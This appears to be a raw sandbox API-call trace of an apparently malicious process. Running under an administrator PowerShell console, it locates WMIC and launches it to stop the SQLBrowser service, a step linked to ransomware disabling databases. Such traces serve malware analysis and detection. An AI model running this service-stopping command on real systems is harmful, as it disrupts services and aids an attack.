GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c96d940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0243.781] SetErrorMode (uMode=0x1) returned 0x1 [0243.782] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.JS", lpFindFileData=0x1c96dae0 | out: lpFindFileData=0x1c96dae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0243.782] SetErrorMode (uMode=0x1) returned 0x1 [0243.782] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c96d940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0243.782] SetErrorMode (uMode=0x1) returned 0x1 [0243.782] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.JSE", lpFindFileData=0x1c96dae0 | out: lpFindFileData=0x1c96dae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0243.782] SetErrorMode (uMode=0x1) returned 0x1 [0243.783] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c96d940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0243.783] SetErrorMode (uMode=0x1) returned 0x1 [0243.783] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.WSF", lpFindFileData=0x1c96dae0 | out: lpFindFileData=0x1c96dae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0243.783] SetErrorMode (uMode=0x1) returned 0x1 [0243.783] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c96d940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0243.783] SetErrorMode (uMode=0x1) returned 0x1 [0243.784] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.WSH", lpFindFileData=0x1c96dae0 | out: lpFindFileData=0x1c96dae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0243.784] SetErrorMode (uMode=0x1) returned 0x1 [0243.784] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c96d940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0243.784] SetErrorMode (uMode=0x1) returned 0x1 [0243.784] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.MSC", lpFindFileData=0x1c96dae0 | out: lpFindFileData=0x1c96dae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0243.784] SetErrorMode (uMode=0x1) returned 0x1 [0243.785] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c96d940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0243.785] SetErrorMode (uMode=0x1) returned 0x1 [0243.785] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic", lpFindFileData=0x1c96dae0 | out: lpFindFileData=0x1c96dae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0243.785] SetErrorMode (uMode=0x1) returned 0x1 [0243.785] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c96d940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0243.785] SetErrorMode (uMode=0x1) returned 0x1 [0243.786] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.ps1", lpFindFileData=0x1c96dae0 | out: lpFindFileData=0x1c96dae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0243.786] SetErrorMode (uMode=0x1) returned 0x1 [0243.786] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c96d940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0243.786] SetErrorMode (uMode=0x1) returned 0x1 [0243.786] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.psm1", lpFindFileData=0x1c96dae0 | out: lpFindFileData=0x1c96dae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0243.786] SetErrorMode (uMode=0x1) returned 0x1 [0243.787] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c96d940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0243.787] SetErrorMode (uMode=0x1) returned 0x1 [0243.787] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.psd1", lpFindFileData=0x1c96dae0 | out: lpFindFileData=0x1c96dae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0243.787] SetErrorMode (uMode=0x1) returned 0x1 [0243.787] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c96d940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0243.787] SetErrorMode (uMode=0x1) returned 0x1 [0243.788] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.COM", lpFindFileData=0x1c96dae0 | out: lpFindFileData=0x1c96dae0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0243.788] SetErrorMode (uMode=0x1) returned 0x1 [0243.788] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c96d940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0243.788] SetErrorMode (uMode=0x1) returned 0x1 [0243.788] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.EXE", lpFindFileData=0x1c96dae0 | out: lpFindFileData=0x1c96dae0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5694022d, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x5694022d, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xfd50fc30, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x8a400, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMIC.exe", cAlternateFileName="")) returned 0x1feb60 [0243.788] FindNextFileW (in: hFindFile=0x1feb60, lpFindFileData=0x1c96daf0 | out: lpFindFileData=0x1c96daf0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5694022d, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x5694022d, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xfd50fc30, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x8a400, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMIC.exe", cAlternateFileName="")) returned 0 [0243.789] FindClose (in: hFindFile=0x1feb60 | out: hFindFile=0x1feb60) returned 1 [0243.789] SetErrorMode (uMode=0x1) returned 0x1 [0243.790] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.exe", nBufferLength=0x105, lpBuffer=0x1c96dc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\WMIC.exe", lpFilePart=0x0) returned 0x21 [0243.790] SetErrorMode (uMode=0x1) returned 0x1 [0243.790] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.exe" (normalized: "c:\\windows\\system32\\wbem\\wmic.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c96de10 | out: lpFileInformation=0x1c96de10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5694022d, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x5694022d, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xfd50fc30, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x8a400)) returned 1 [0243.790] SetErrorMode (uMode=0x1) returned 0x1 [0243.790] CoTaskMemAlloc (cb=0x23) returned 0x1b9b1010 [0243.790] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x1c96dff8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c96dff8) returned 0x4550 [0243.791] CoTaskMemFree (pv=0x1b9b1010) [0243.791] GetConsoleWindow () returned 0x5011e [0243.792] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0243.792] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0243.792] CoTaskMemFree (pv=0x2af7b0) [0243.792] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0243.792] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0243.792] CoTaskMemFree (pv=0x2af7b0) [0243.793] CommandLineToArgvW (in: lpCmdLine=" path Win32_Service where \"name like '%%SQLBrowser%%'\" call stopservice", pNumArgs=0x1c96e040 | out: pNumArgs=0x1c96e040) returned 0x28a430*="" [0243.793] lstrlenW (lpString="path") returned 4 [0243.793] CoTaskMemAlloc (cb=0xc) returned 0x1b9cc7f0 [0243.793] RtlMoveMemory (in: Destination=0x1b9cc7f0, Source=0x28a472, Length=0xa | out: Destination=0x1b9cc7f0) [0243.793] CoTaskMemFree (pv=0x1b9cc7f0) [0243.793] lstrlenW (lpString="Win32_Service") returned 13 [0243.793] CoTaskMemAlloc (cb=0x1e) returned 0x1b9b1010 [0243.793] RtlMoveMemory (in: Destination=0x1b9b1010, Source=0x28a47c, Length=0x1c | out: Destination=0x1b9b1010) [0243.793] CoTaskMemFree (pv=0x1b9b1010) [0243.793] lstrlenW (lpString="where") returned 5 [0243.793] CoTaskMemAlloc (cb=0xe) returned 0x1b9cc7f0 [0243.793] RtlMoveMemory (in: Destination=0x1b9cc7f0, Source=0x28a498, Length=0xc | out: Destination=0x1b9cc7f0) [0243.793] CoTaskMemFree (pv=0x1b9cc7f0) [0243.793] lstrlenW (lpString="name like '%%SQLBrowser%%'") returned 26 [0243.793] CoTaskMemAlloc (cb=0x38) returned 0x1b9c7170 [0243.793] RtlMoveMemory (in: Destination=0x1b9c7170, Source=0x28a4a4, Length=0x36 | out: Destination=0x1b9c7170) [0243.793] CoTaskMemFree (pv=0x1b9c7170) [0243.793] lstrlenW (lpString="call") returned 4 [0243.793] CoTaskMemAlloc (cb=0xc) returned 0x1b9cc7f0 [0243.793] RtlMoveMemory (in: Destination=0x1b9cc7f0, Source=0x28a4da, Length=0xa | out: Destination=0x1b9cc7f0) [0243.793] CoTaskMemFree (pv=0x1b9cc7f0) [0243.793] lstrlenW (lpString="stopservice") returned 11 [0243.793] CoTaskMemAlloc (cb=0x1a) returned 0x1b9b1010 [0243.794] RtlMoveMemory (in: Destination=0x1b9b1010, Source=0x28a4e4, Length=0x18 | out: Destination=0x1b9b1010) [0243.794] CoTaskMemFree (pv=0x1b9b1010) [0243.794] LocalFree (hMem=0x28a430) returned 0x0 [0243.794] CoTaskMemAlloc (cb=0x804) returned 0x1b9dc850 [0243.794] GetConsoleTitleW (in: lpConsoleTitle=0x1b9dc850, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48 [0243.794] CoTaskMemFree (pv=0x1b9dc850) [0243.794] CoTaskMemAlloc (cb=0x114) returned 0x253f20 [0243.794] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%SQLBrowser%%'\" call stopservice", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x1c96dfa0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x310d210 | out: lpCommandLine="\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%SQLBrowser%%'\" call stopservice", lpProcessInformation=0x310d210*(hProcess=0x54c, hThread=0x548, dwProcessId=0x920, dwThreadId=0x36c)) returned 1 [0243.798] CoTaskMemFree (pv=0x253f20) [0243.798] CloseHandle (hObject=0x548) returned 1 [0243.798] CoTaskMemAlloc (cb=0x23) returned 0x1b9b1010 [0243.798] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x1c96e048, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c96e048) returned 0x4550 [0243.799] CoTaskMemFree (pv=0x1b9b1010) [0243.799] GetCurrentProcess () returned 0xffffffffffffffff [0243.799] GetCurrentProcess () returned 0xffffffffffffffff [0243.799] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x54c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c96e128, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c96e128*=0x548) returned 1 [0244.805] CloseHandle (hObject=0x548) returned 1 [0244.806] GetExitCodeProcess (in: hProcess=0x54c, lpExitCode=0x1c96e198 | out: lpExitCode=0x1c96e198*=0x0) returned 1 [0244.806] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1 [0244.807] CloseHandle (hObject=0x54c) returned 1 [0244.807] SetEvent (hEvent=0x518) returned 1 [0244.807] SetEvent (hEvent=0x50c) returned 1 [0244.807] SetEvent (hEvent=0x510) returned 1 [0244.807] SetEvent (hEvent=0x514) returned 1 [0244.808] SetEvent (hEvent=0x528) returned 1 [0244.808] SetEvent (hEvent=0x51c) returned 1 [0244.808] SetEvent (hEvent=0x520) returned 1 [0244.808] SetEvent (hEvent=0x524) returned 1 [0244.808] SetEvent (hEvent=0x52c) returned 1 [0244.808] CoUninitialize () Thread: id = 159 os_tid = 0x264 [0244.838] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0244.840] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0244.841] VirtualQuery (in: lpAddress=0x1c82d960, lpBuffer=0x1c82e820, dwLength=0x30 | out: lpBuffer=0x1c82e820*(BaseAddress=0x1c82d000, AllocationBase=0x1bea0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0244.843] VirtualQuery (in: lpAddress=0x1c82dc10, lpBuffer=0x1c82ead0, dwLength=0x30 | out: lpBuffer=0x1c82ead0*(BaseAddress=0x1c82d000, AllocationBase=0x1bea0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0244.847] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0244.847] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0244.847] CoTaskMemFree (pv=0x2af7b0) [0244.848] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0244.848] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0244.848] CoTaskMemFree (pv=0x2af7b0) [0244.848] CoTaskMemAlloc (cb=0x20e) returned 0x2bb0c0 [0244.848] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x2bb0c0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0244.848] CoTaskMemFree (pv=0x2bb0c0) [0244.849] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c82d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0244.849] SetErrorMode (uMode=0x1) returned 0x1 [0244.849] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.ps1", lpFindFileData=0x1c82db40 | out: lpFindFileData=0x1c82db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0244.850] SetErrorMode (uMode=0x1) returned 0x1 [0244.850] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c82d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0244.850] SetErrorMode (uMode=0x1) returned 0x1 [0244.850] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.psm1", lpFindFileData=0x1c82db40 | out: lpFindFileData=0x1c82db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0244.850] SetErrorMode (uMode=0x1) returned 0x1 [0244.850] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c82d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0244.851] SetErrorMode (uMode=0x1) returned 0x1 [0244.851] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.psd1", lpFindFileData=0x1c82db40 | out: lpFindFileData=0x1c82db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0244.851] SetErrorMode (uMode=0x1) returned 0x1 [0244.851] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c82d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0244.851] SetErrorMode (uMode=0x1) returned 0x1 [0244.851] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.COM", lpFindFileData=0x1c82db40 | out: lpFindFileData=0x1c82db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0244.852] SetErrorMode (uMode=0x1) returned 0x1 [0244.852] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c82d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0244.852] SetErrorMode (uMode=0x1) returned 0x1 [0244.852] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.EXE", lpFindFileData=0x1c82db40 | out: lpFindFileData=0x1c82db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0244.852] SetErrorMode (uMode=0x1) returned 0x1 [0244.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c82d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0244.853] SetErrorMode (uMode=0x1) returned 0x1 [0244.853] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.BAT", lpFindFileData=0x1c82db40 | out: lpFindFileData=0x1c82db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0244.853] SetErrorMode (uMode=0x1) returned 0x1 [0244.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c82d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0244.854] SetErrorMode (uMode=0x1) returned 0x1 [0244.854] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.CMD", lpFindFileData=0x1c82db40 | out: lpFindFileData=0x1c82db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0244.854] SetErrorMode (uMode=0x1) returned 0x1 [0244.854] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c82d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0244.854] SetErrorMode (uMode=0x1) returned 0x1 [0244.855] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.VBS", lpFindFileData=0x1c82db40 | out: lpFindFileData=0x1c82db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0244.855] SetErrorMode (uMode=0x1) returned 0x1 [0244.855] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c82d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0244.855] SetErrorMode (uMode=0x1) returned 0x1 [0244.856] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.VBE", lpFindFileData=0x1c82db40 | out: lpFindFileData=0x1c82db40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0244.856] SetErrorMode (uMode=0x1) returned 0x1 [0244.856] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c82d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 